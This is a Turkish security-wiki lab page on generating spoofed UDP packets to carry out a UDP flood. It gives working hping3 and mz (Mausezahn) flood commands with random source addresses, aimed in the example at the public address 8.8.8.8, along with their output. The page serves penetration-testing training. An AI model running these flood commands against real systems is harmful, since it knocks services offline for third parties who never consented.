Sahte UDP Paketi Üretimi

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Sahte UDP paketleri üretilerek UDP Flood saldırısı gerçekleştirmek.

Araçlar:

  • hping
  • mz

Lab Senaryosu:

UDP Flood saldırısı hedef sisteme rastgele kaynaklardan sürekli olarak UDP paketi gönderilerek gerçekleştirilir. Bu uygulamada ise hping ve mz araçları kullanılarak hedef sisteme rastgele adreslerden gönderilmek üzere UDP paketleri oluşturulacaktır.

hping aracı kullanılarak;

Saldırgan IP adresinin de aralarında bulunduğu rastgele IP adreslerinden UDP paketleri gönderilerek hedef DNS servis sunucusu kaynakları tüketilecektir.

root@bgakali:/home/pentest# hping3 --udp 8.8.8.8 --rand-source --flood
HPING 8.8.8.8 (eth0 8.8.8.8): udp mode set, 28 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 8.8.8.8 hping statistic ---
70934 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Aynı senaryonun mz aracı ile farklı bir şekilde gerçekleştirilmesi ise aşağıdaki gibidir.

mz aracı kullanılarak;

root@kali:~# mz  eth0  -c  0 -d 10msec -B 8.8.8.8 -t udp dp=32000 -P "Multicast test packet"
[Multicast test packet]
Mausezahn will send frames infinitly...